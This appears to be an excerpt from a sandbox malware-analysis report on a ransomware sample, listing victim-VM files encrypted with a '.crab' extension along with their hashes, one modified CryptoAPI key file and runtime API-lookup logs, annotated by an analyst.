c:\users\5p5nrgjn0js halpmcxz\favorites\windows live\windows live spaces.url.crab 0.65 KB MD5: 1bdcaabd3d22af1c718a2c5e1faddf24
SHA1: eacd9667c3ad539c3fdbfd422f50fcdeff5f95cf
SHA256: 9f5b1f59c9c7c549fb0b28a61b10144bfa6938b05431ffb713bfad98a6cdcd6e
False
c:\users\5p5nrgjn0js halpmcxz\music\g7 9lmvdu4uxdoljrf.wav.crab 40.87 KB MD5: d75b74a7c0a1f7eb63d109143502d2bf
SHA1: acbb3d0163ef2923eec145659a915968ce56f72f
SHA256: c9cece4f307bb5de6a489aa72b32179d2d16f1f52d1a850526b1a918b8f7dffa
False
c:\users\5p5nrgjn0js halpmcxz\music\mjirmot4cohec3fu.m4a.crab 56.30 KB MD5: b21c925bd7139438b2add531d2b797ab
SHA1: d0a287c3e6d8bf61f2de366a9cede69e8b8a0605
SHA256: 657fdd99bd7cac1caf3e7420f3946f8616739dead64abaefad4a93c0100e8d63
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\c94j9nmhprafustnat.m4a.crab 29.74 KB MD5: c07a10b6da78e3e2b8023edf192e5c7f
SHA1: 353ff0a59177afcf2d262982a446df164e3a007b
SHA256: 5f0644a8326bbf458ef187adbd0da274261d84f0062cc7f54117287c0eea1ff0
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\inl4q\-nfnejge5.m4a.crab 86.66 KB MD5: e9e54ea2c3fd81f785b7446b342e5e17
SHA1: 66f32481d0d37fe2e7e3093eb49773578a020e51
SHA256: 3031c9f2d67f1ba1444d01d97cd4cbf94c5974f230f4c3acbec7bf7cf7b2944d
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\inl4q\-qfj4endv5.m4a.crab 87.99 KB MD5: 2de005a701a128dd518fcd838af796af
SHA1: 9081aef4ce18a50254ae9334be522401d801f097
SHA256: 4df06896aa56240405c6a60f0efdd9f3722c57b16e0190f6dabb5ec1bcc4c058
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\inl4q\2crmfqu.mp3.crab 36.98 KB MD5: e259e41226c7642cd49485997f957336
SHA1: e085d2dcc70b7e20ca842dafc251921c5fe9545a
SHA256: af2476f4a59235962d0d91c1cae651c5fbec4b527ae2ff0c3d5c6f9bea9973d3
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\inl4q\cpi6o60qv.m4a.crab 50.88 KB MD5: fddd6d14b6912c19b40d4cd42fc6845c
SHA1: 4f0cdc23b6cec77a642562dceaf70de844bb7f42
SHA256: a0fd728663bbd98bb7600450745407f30e1b5ec23a25c9c589fe1adce39d9d5d
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\khvpwza8qwlllf9rsz5.wav.crab 18.68 KB MD5: b593a406a8183e838056d8a14c73ca3e
SHA1: 8ba9cf361a7ea7c1d58f943848b3280a6824efe6
SHA256: 825026ea1ae22b4add623fae59777d0baeaa5200f4812e2f73c2d5a69adc7dcf
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\ntusvjkocwdjwyru7.mp3.crab 58.91 KB MD5: ef434a5abb56ef2ecde469217d7c45a8
SHA1: de2e60818f47ee31edb68d999121042b6318ebe2
SHA256: bf1d3b0469237996ef275abab2df6e234149c8775cb8621f50b5fcf3cf9a6727
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\t c9d3.wav.crab 45.90 KB MD5: 4f93c986ee5cb755dd3c15dac45dbfd0
SHA1: 2a268148acff9c8630cca21013e6f29e7069779d
SHA256: 00263c6ad4873fdc2ee4d9008bd582051a8d3ddc46b40362d6033ddb0a5701a3
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\0ds3.wav.crab 76.51 KB MD5: b18a1136739081184efb081503e05fa2
SHA1: a47723cd076655e459bf85ff491d067a2bd4d8bd
SHA256: 5002b68fce1a1507e964639753817cb92e70713137f3ef2c04be88c66204aa8c
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\3qpftzi8npnaxry.wav.crab 27.13 KB MD5: ab3d83f1a206fc59bc4003581764394e
SHA1: 1f99b1faba5302945e3bdf13bb15e78910b77677
SHA256: aee592b3dbe17b0db36b7e205fce9d94bf9e5b692550b563df3f8e76260e5143
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\adu2bqh8f.mp3.crab 24.65 KB MD5: 429b4561e54391d47541af04b26ee51c
SHA1: d586e9bb00e67c4e692079d2160fcdb42d33e3a4
SHA256: e592afeb86518c597f6f43f55caca3761a30342fff8d7edf0d8cbf7de6358770
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\fxemvakcdnj1x.mp3.crab 57.24 KB MD5: 09e72b725042e5daaaf7ea81cdc393d2
SHA1: 34bd3cadec0db51f46da05ffc222863248384c83
SHA256: c9d8bffae4ecaefc9dceace6dac05814ab86a5254a3599bc6aa9e269a0810e62
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\rbv5cx3xmx.mp3.crab 49.45 KB MD5: 5b115949b61fc40efc898b67e901c1e0
SHA1: aac71bd354574ee1f245410a7f1255e5383f104a
SHA256: f6f497089ae99f93ec2c857415a6c61da0362654cb01e364a8750a7809c83c8e
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\rdsg2e5.wav.crab 93.13 KB MD5: e81fe2f66cb03f98fbb2a7d2cd881eff
SHA1: b4a7c8f6e9697e261dc8c2a13c2ade8f2c720c19
SHA256: a6593da618372675c2ac4f3ec4fba036b77f4c79eac065d83b340ff3b60c8058
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\x0vr.m4a.crab 68.65 KB MD5: ae7e9c4817cc6badb6c9ca5910668c25
SHA1: 51039857fb1d507787ac60cf211bc36a6625bb1b
SHA256: 88628e8f6718ee80c95e3648a7b5c8c4757c8841d51ae2ff31def8de1a7bfb86
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\1onm- n_x9gcx_j\gmfigcxzisicjvnz.mp3.crab 23.29 KB MD5: 0ece0aa5f1e04918a59a81903955bc9a
SHA1: 7bcf54e7b583c71dd15d31219352799e0b202fb2
SHA256: 3ba074759c45e18776eca62b513c6e09b5352a79b7787faeedbf130f7efe9ad1
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\1onm- n_x9gcx_j\ntlixq.m4a.crab 88.26 KB MD5: ae239349e8a229d3e882f1cc587af5e8
SHA1: 65886b464092635f14df45c0722beffb3843c64a
SHA256: d7ba7fc42aa8552c4e873b6284e9f487eec34ae98b503455c38edd5aee990aae
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\7vzld80gbo4j.mp3.crab 7.21 KB MD5: bfba1e5ee599e9a6838797413283da3b
SHA1: 5274f725b18cac775f89da078ba3aa6a54dbcb84
SHA256: 788c0c3bab118e277d116ff5cc8428f32ad0cea5585f2ad8c9c139deb4c9b416
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\foy0yh.m4a.crab 9.73 KB MD5: 8e4178613de4e9ce3b23d1c114b7e7f8
SHA1: dbe2a1ae86d8a9d9dd877d21a820212d5f5441f3
SHA256: 65020f8e64a5509ddafd03eafbe5a39f3cbbc094fa8030ca712f54419e09fea1
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\k6kjtr3ydhqi3zav.mp3.crab 8.41 KB MD5: 6670ebf15c3e1b970826af3d430f561b
SHA1: 114bed7ec9eb190cbbfdaca95b7db4527bfafb3d
SHA256: 15ddee3c61c44dd423f342a2d4e04573a4b3d4991a79ee9ae93d24531f25a26c
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\pp2s8u.m4a.crab 8.12 KB MD5: d47371fdbe86e7796e7c73daf00fc356
SHA1: 2c92875bb0cddb5631388b31e57e8c621460286b
SHA256: 6337657e7c26ba953fb8c0b0ce237fc7190fb0879ee7394a62b22637d21bbf99
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\zab3b7u sn4.m4a.crab 25.88 KB MD5: 6538acfd1f79f8dca05d6747f0c197b1
SHA1: fd3bd7126e91c8c402e3d50ac47af3dbf2a99731
SHA256: 897157eac2c8c2b924303fc153a64bf645244f3d9eef9d95e8966c7ae4a50881
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\c06iavekw\xxqwypul\_wm2uinrr7.wav.crab 80.12 KB MD5: cd66f75b290d85e51e5d1cbadb9f5920
SHA1: 12a875c65f069cf8382d09dc2e03d6fcfbbfbeb9
SHA256: 89d38df489d9b16a61acd4cd8cd5a9db909787b7cbbcdcb8c85997d58ef2f661
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\cqcu.mp3.crab 38.74 KB MD5: b3f81e1a5f970780cb643758ce1ee255
SHA1: 829c42ba779230ec97723e790a781a8b7addacc8
SHA256: 0cbbfec0432fa61758f72ac11ae368e934b3e0bbb3a67c09a504a5cca65cd831
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\g-jrmnm_nqgjtqyvesv.wav.crab 38.43 KB MD5: f650f44280369bd327f72cb62cd5cad8
SHA1: dea99f2ed84bdb229b3b1eab5510ed0c45d1adfb
SHA256: 3358635d5c8428b835c2c13ed4b3ca1e43309e8f1259e15ddd0d6bde9210b086
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\tvaj5naf9xf.mp3.crab 90.99 KB MD5: 07a48172e99d408e9504524c8b1412d2
SHA1: 33bbf148e93a6374e500db3b8b46197e595704bd
SHA256: 66d035c8edb6b5b9e7c450f3fda25264cb08e8692aa26d1aa72609bd5404791a
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\vvfu7-c\lspj23a.m4a.crab 82.55 KB MD5: 3db779210ba176035b9b9db1a3a3150a
SHA1: 6985dde31158f1584ecf19c025f632ae4eb47b00
SHA256: 319c2c3be5391971dec478d19d5dfaa582a347610ee294afb55356441aaac115
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\24endo2rsr15sdp3\vvfu7-c\vgllbhsrwiu5n0yn8c8.mp3.crab 54.85 KB MD5: 831063ed358dd0409e2ab41d7e8ec17e
SHA1: 19002def53aef208ec86266db60d21e80ea2e04a
SHA256: a5ce6cf392ef262995ce3c4fca72689dc7bfdb0bed1d964e362cb24fe9a1425b
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\fjgqshfegk-a.wav.crab 84.29 KB MD5: fbf7f253444eb6964b815cdc212878f3
SHA1: 95bcbc78d5a363e4533c9a164601b07dad412b8c
SHA256: bc1f2750ad3b17638eab84a4b1c657ff8f752e751291847f39ab35a60db1ed67
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\pl4n zcq2fe9n.m4a.crab 68.45 KB MD5: 0a053ddf86eeb8bcfaac48c108632fda
SHA1: 8e309260c665db44579989526004b3d03fd6f095
SHA256: aa13922b2d6b1199836929d4a4248775bca69b24bc656bd0490be15409ab3cc1
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\za4gzzm\gz6qf6haibch0stzyw.m4a.crab 93.59 KB MD5: 13202037bf10515810934c67f58a1cab
SHA1: 5d0634fb5708c986de799b52e05cfe69c5408794
SHA256: adad2a667e27aab15f75fc27d6975cc7854b080c316f883d8d06067a3eedceda
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\za4gzzm\paz3fuupbscnqa.mp3.crab 49.70 KB MD5: eb42b7a0f02b7b4a7e386bdbffec3c69
SHA1: 6b5d1c60fcc47d650335bf5c9800cfe7dd4e44d1
SHA256: a0dcb0b9071aa846634882fa9db67b845360aa28d2a28b99ae3160ed043b1389
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\za4gzzm\vk99f3lkw-ydi.m4a.crab 74.74 KB MD5: 4aebce1b1a8ea37bee49631cde682ea7
SHA1: 9702074bdc076ee4b1c6519091f1085f31108a29
SHA256: 0115bae74d9909aa7272669e759cb8de4f0b568cbbb9aef3d1f757416298445d
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\in2oi15yt\xr01\ztrhl.mp3.crab 85.26 KB MD5: c5db211db973e75d67a9ed4e115bf155
SHA1: 9681101d50caa7b2ef3747a7ad16ce0b0a7a31cb
SHA256: b125f7479312c147f8947cb3233be6630750ccdc66702cf4deb63bf8619d6ad5
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\mxyrqw-lqfo.mp3.crab 35.15 KB MD5: 41c1fc22c9adb486ce6c79c4522537ce
SHA1: eb6386b8ffdf2c5a895a30aadeb76b836878a280
SHA256: 4540b5638ddb95efa69ac45f45befb1a149ea9d9659c4f6a50186ad7824d3d47
False
c:\users\5p5nrgjn0js halpmcxz\music\n6zv9eawsn-5\xmth_q.mp3.crab 82.07 KB MD5: 2f733d0289fd89262c17d2cbe1658b20
SHA1: dc2f6f06e9008fe4fa0be905918a89e36537aa66
SHA256: 2801d3633dcddf60084f99d6a178e455152b0d53f887506a862b36587c463c18
False
c:\users\5p5nrgjn0js halpmcxz\music\w6_9p6vwt-xf c-flu.m4a.crab 8.37 KB MD5: 0cd422a8afa082e2d2c44f2ea94e82bb
SHA1: 0d7006f2a73e2f93af6f953ffb07be8dd776e19d
SHA256: 82df4e1898468a4f2e3086d960273d59cd2119392fcb352a08d01d10f14c0859
False
c:\users\5p5nrgjn0js halpmcxz\music\wkktgnmukkcle0epu.mp3.crab 95.52 KB MD5: 2049a20800cbefafa7940f4650f27aec
SHA1: f742bad52a010492c217f4e6f3c7b2a37249960c
SHA256: 7d1ae092bb2b92450245fd66e731e55ede08066a23dcc18c6cd2988b1a32b5f5
False
c:\users\5p5nrgjn0js halpmcxz\ntuser.ini.crab 0.54 KB MD5: 0f0829ea5b36771fc790f46e41c27a1e
SHA1: 9dbc8c229e0b9564337f39c1edd8400b1f811043
SHA256: 6cab7653cc3ae8850d2788db1267eda94c41fab5e9c7ff9a9cb9f282183c2a9e
False
c:\users\5p5nrgjn0js halpmcxz\pictures\-tve9f.gif.crab 79.30 KB MD5: 188c8f5ec13da3b2587c50a30a88e572
SHA1: 059170592f33ffe9b98001bd9f31cd94ee5860a8
SHA256: 2200df7e573f264812bddf68c07a4ca122df33dd6c3e34365e1217a14d85af30
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\2vidpacu 9yeg2dvw.gif.crab 58.32 KB MD5: b61eb57dc2cb0ce21c89e3631559355a
SHA1: e5b6016c12445b89486752ae961fd56bddb49995
SHA256: 4536247aa3c6f208775fab225375efc3a8df571fefa18dfc9f52170cd2492dee
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\3mqoykdku3e6f.bmp.crab 8.90 KB MD5: d4bfc134f6a66f62b6c782121a94bbb8
SHA1: 860165164404ffe956edc1ebd686dfa682baa628
SHA256: 24d75ba5d5ff80a50ffacbf0d53fbf2fa539a33e7eeab599e1863427c7f36f83
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\accs5ax.gif.crab 69.95 KB MD5: 71e0fc9a7644355552f8faeeeac4723a
SHA1: f348018531c5ab2103db8df413b9b8c6ed43c4a2
SHA256: f43ca05cafe7c12414a15f3e1b0627664f0e4652c378654603d6c2987c377689
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\jkt1f.gif.crab 32.82 KB MD5: 4c4223e2c350b61faeec7d846e48e092
SHA1: 73e6ccc236578c948d51ee5e022652d9ca4fa08a
SHA256: 22ab5da1f3b08a9ebf3c704837d7a7ea202f1973ad25460170fd3c667fa6f8c8
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\m8z7p0uvyrd.jpg.crab 11.09 KB MD5: 95e0fb7a2512dfcc2c011f0a21c9044f
SHA1: 9af0149a4c065b8f44fba1ed1bec978d96102f7c
SHA256: 4d341960183eaa83f8f1663d4657069645f3c0cdad6cddd586dc50d5f1b948b0
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\pqs4yaj1ihqnb.bmp.crab 23.54 KB MD5: 08ea24aabfc8cd30fd53792aa0dfaed6
SHA1: 995f9230e6476bdd27108d87bd568d00a1d3344f
SHA256: f1b39e85f476370ff613e15ede4604bf311875b1d69fe550ec1a7955d7f62ae0
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\uju1tvt_z7h_8jrqa1.jpg.crab 62.79 KB MD5: 54323b7a7a18e31fadde4f5219664ebd
SHA1: b39f306e04e47c4ae02edd097dbeec67eda18889
SHA256: 0eba9ffb4a6458a8f811b375f2296ae4078bf383cbe572bd16f5916c752a0c31
False
c:\users\5p5nrgjn0js halpmcxz\pictures\0wo6ya\ygl_pvkgm4m -9vru.bmp.crab 18.46 KB MD5: 7fd0c6a3cf2345a828df75576912d9e5
SHA1: 60601bef3b1fe77c7d89484f2107c4aa653b0bc0
SHA256: 939544f2e6307f03fe579ace02df10503ddefc1b6638f4c73c9672cdfe793645
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\9f_qs.gif.crab 25.63 KB MD5: 7480f54d57f040ce3cb6a95ccaebeb26
SHA1: 5bb7217c9ec79c7130b75ee9f316bc0109de8b1a
SHA256: 8b567320b49fc9f07a0139ded0603cfa61842889782f9b5cf7ac24f8c1bb3e0f
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\iychkcfbo-k42lq8.jpg.crab 94.91 KB MD5: da37a78b79f2b5cb656924bb9a30125f
SHA1: aaef7ec5f9e651fafa66623e939e8d447d3353fe
SHA256: 6cfa97d86c8899d4786fe6f6110014996753afd652e40cc804b2492cc6c1f227
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\lwu4_og.png.crab 84.13 KB MD5: 5985f616e66a6bbd9f0ea25cbf04117b
SHA1: 5d9b2aa75c1dce0dc1c25ccea4c3d4a2b75e9a08
SHA256: 8ba784563990f21cc7ec5be1b9ab8664f3a8d3fe6cb1006c9aa1765dc7fa8b91
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\n_ymz48xpzse76vsxy.bmp.crab 12.62 KB MD5: 9e08cec4e44a745d7f3a9fbcdcc1e2a1
SHA1: f660e68eef2f51e16189694ff9289818ddf1225e
SHA256: 199eb810a4a782bae424de3f55c2f9693634f67cabf67f5ada1677a2547237cb
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\rwsrbz2742.jpg.crab 6.05 KB MD5: 6c2625c405d2f0cf5b7e0102bd6f8d27
SHA1: b7634fe8b0d7f82a2afca9ef96e6a38e59950307
SHA256: 6e74ad83a940328daea8c34e56b7dc562307978d604589f82095b2c976207cda
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\ta-canrz9cv-gr.gif.crab 42.96 KB MD5: 745c049cf045561320d6d46e112b4f2f
SHA1: 9d9dfcf612c9933c108cb38a7dc078fc569f9688
SHA256: e215ded856c9d0f2f58546cc4966fb20270f539a464f2fafd15d29b43a8d63c9
False
c:\users\5p5nrgjn0js halpmcxz\pictures\6gnobpugwk\u72gnwdfp5.bmp.crab 94.35 KB MD5: 5936c0393dffcfdefd51c6b3ec0b5d19
SHA1: 7d3d5884531b130bba5a761bb9a213067ed0054a
SHA256: 14e7de5d29b8218550a8915267f3c4e1ecf1889f3960eece396bb951185c5127
False
c:\users\5p5nrgjn0js halpmcxz\pictures\9yfx78p3pzej.gif.crab 51.79 KB MD5: 29b95817c3abe8e1ec9e3823bb0df40a
SHA1: 9c825328e19d36e89238082ec08b66611750aaae
SHA256: a5d4b53a52e940a67c680801acfe06abb41637108e0bf3533ccc2fb0ebcc26f7
False
c:\users\5p5nrgjn0js halpmcxz\pictures\av8nexdgw.png.crab 24.15 KB MD5: 48f95e58a5de71d2d631f6d8ffcac236
SHA1: 9c6e15efc1034c95e47017f0d406fa4a9e035044
SHA256: 6c86c6b1f802d1b76f054f8de2df002aafb46c89a91187a8ad228587e0afa684
False
c:\users\5p5nrgjn0js halpmcxz\pictures\dlup7nguzfkm.bmp.crab 56.27 KB MD5: 3f5dc54607846dfcf3e94c4737dad8ed
SHA1: 5ddce02ad2083926e982c869191ca5c18c0f99a9
SHA256: 45d26bb0cce46408b57a7057114076758a8d236e3f300ca17243177d137e9b0e
False
c:\users\5p5nrgjn0js halpmcxz\pictures\nioxokjw1gjl.png.crab 29.46 KB MD5: e305a12d4ddfafaf4cbcabafb737e1e6
SHA1: cc1d03f7cdbae39bf74d73c2e2522948a804af7c
SHA256: debcc97b560554a2f01d8b6081267747a32ff81947579e3b2d5a070e5917b05c
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\8fz7awe3ry9cqpnp_co\hllb7htbfja_5zvc.jpg.crab 83.82 KB MD5: 4ae728be9cdfa7f7b35a3a9a49be3e0f
SHA1: 5b13697c4d3d0371300045669dd5a35dd2a45936
SHA256: e74fd7b64dfa9d1f3728c51f554b468f5891dd8c8b678eb19f75e6de25a650e3
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\8fz7awe3ry9cqpnp_co\ilgvllw.gif.crab 57.80 KB MD5: 026e9bee62c5c2ad3c860f72c87b574b
SHA1: 13be0165650234e7563a3f8561bf5de085dee436
SHA256: 791d60c0873414ebec8ee28e0f0db9bc215e08d52a242ecd93ab4306a10baf8f
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\epmebyjivitzf6o.gif.crab 67.30 KB MD5: 73cfa04374c2745be3c989a9cf4e186d
SHA1: 9ea13ed6be6894a1963281997522ada2bccd1607
SHA256: 370cdc9091a758dc09cef30a8e84365153af26bc6196c15cf648ed92cef7ee35
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\jdybdm.gif.crab 53.21 KB MD5: bf9883210dfa487f75b6573b355ab14e
SHA1: 71d1e1098eef0d769a181416743faac107b37706
SHA256: c16c861be363b61fe40f9c25e9a7cf528e074e44ed0bacd077392ae124b96d6c
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\3wnok7lguniejo.bmp.crab 18.02 KB MD5: 9adc8bc97463900620f95b6d73337713
SHA1: af266aecbee1844103f8ab36e77bd02b4b12401e
SHA256: 8d4f365bbd77f9afbe380a887103cdaa9ec202b64542ab584c6b23c14b197591
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\bxzv cr.png.crab 93.79 KB MD5: 933ab24b3b87861bdd4000230dc5b841
SHA1: 4cf16b94ecfcc763d61be6f84269b516c479269b
SHA256: 80465054fdb0a681f81995377e6e8eecfdc1e4126166baa25b12a6ac871c5c78
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\cxd-mrra.gif.crab 94.79 KB MD5: 043417027f5fa522350564337505c4ea
SHA1: e4e9e519f6f66dc1b76df66e1b5b4546bc1635a8
SHA256: 622f6601b5e59019ece2e9a79e120c4b80731ea9c4355532233a6ec27d2fc2f7
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\i7bysmfgkjw8gx 1\6jbor gv.jpg.crab 55.01 KB MD5: 8407ee7f0f434e9cf2f50db9dd944cae
SHA1: 71b0a068c10eca1dfdcf6d28566c0bb3defef23a
SHA256: ff306bde661d2f5368e270332f2ed6802975ff413d6662136dad03ae60e4722e
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\i7bysmfgkjw8gx 1\fttulqqe.bmp.crab 59.85 KB MD5: 506ba15544411c7c0b98260cd85b0e82
SHA1: b8d40ed04c5da420dca5211a98eeac108c780451
SHA256: 5c3c7373cfde74560cee3da27a002f6b90d3bc3f1926de33419bdda5df3ba1b9
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\i7bysmfgkjw8gx 1\u09d7fr4ishqnbda.gif.crab 60.73 KB MD5: a474039acd215e9731118342f1d3f21e
SHA1: 0053a90e33587bbb6d8ad53c99a87e8250bcaf24
SHA256: e19c66c8b7f140ae4b9db389aca6e93fec23375f4861c97f2906a221b31605dc
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\j7 4uy.png.crab 24.70 KB MD5: a6a7e554c10ca569d421c1e55a84e49c
SHA1: 83744483fdbce520eb9e41b890f7ea281cdf1c30
SHA256: ad76297e7d960de4f567a9a6677557e5e595f49d6b747a870f1ce1e7f869e9e9
False
c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\jluw_zq5f\-3dbjl.png.crab 79.71 KB MD5: 064c090eb88660f2e0b595f18ef26165
SHA1: b105731597c2508055c30e48ae44825e21a5da40
SHA256: d34d2bed468fd08d0badbc9af7ee8c9b5d87ecee7bd438e9836c44f0b9ab91a5
False
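c:\users\5p5nrgjn0js halpmcxz\pictures\t7skzdy8\lm81\jluw_zq5f\58xcgtwf cs3st.png.crab 4.26 KB MD5: 4d351eca14da1e9d35a23906d87046da
SHA1: 1dcfcbbfa11cc946aa219da17801a16cc474e82f
SHA256: 080420262dcff653a6373d092e53af3b8a004efa416c027fd58605569f374d07
False
[Note: every path in this list carries an added `.crab` extension on top of the original image extension (`.png.crab`, `.bmp.crab`, `.gif.crab`, `.jpg.crab`). The hashes are presumably of the encrypted output of files in this analysis VM's user profile, so they are specific to this run and are not useful as indicators elsewhere. The appended extension and the bulk rewrite of user files are the signals that carry over to detection. The trailing `False` on each entry appears to be the YARA Match column.]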
Modified Files
Filename File Size Hash Values YARA Match Actions
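c:\programdata\microsoft\crypto\rsa\s-1-5-18\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f 0.05 KB MD5: 0d7db7ff842f89a36b58fa2541de2a6c
SHA1: 50f3b486f99fb22648d26870e7a5cba01caed3da
SHA256: 140eda45fe001c0fe47edd7fc509ff1882d46fbcb7c7437d893c1fb83012e433
False
[Note: `...\Microsoft\Crypto\RSA\S-1-5-18\` is the Windows CryptoAPI RSA key-container store for the LocalSystem account (SID S-1-5-18). A modification here is consistent with CryptoAPI key-container activity during the run. This excerpt does not show which process performed the write, so confirm that in the full report before attributing it to the sample.]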
Threads
Thread 0xad8
397 0
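[Note: a `Module Get Address` row records a run-time export lookup; `address_out = 0x0` with Success `False` means the export was not found. In the run from FlsAlloc through SetFileInformationByHandleW below, the four failed lookups (SetDefaultDllDirectories, GetCurrentPackageId, GetFileInformationByHandleExW, SetFileInformationByHandleW) match the optional-API probe that the Microsoft C runtime performs at startup. They reflect the Windows version of the analysis VM rather than sample-specific behaviour.]
Category Operation Information Success Count Logfile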
System Get Time type = System Time, time = 2018-05-11 13:20:41 (UTC) True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75fe4f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x75fe359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75fe1252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75fe4208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75fe4d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x7606410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76064195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x75fed31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x75ffee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77e7441c True 1
Fn
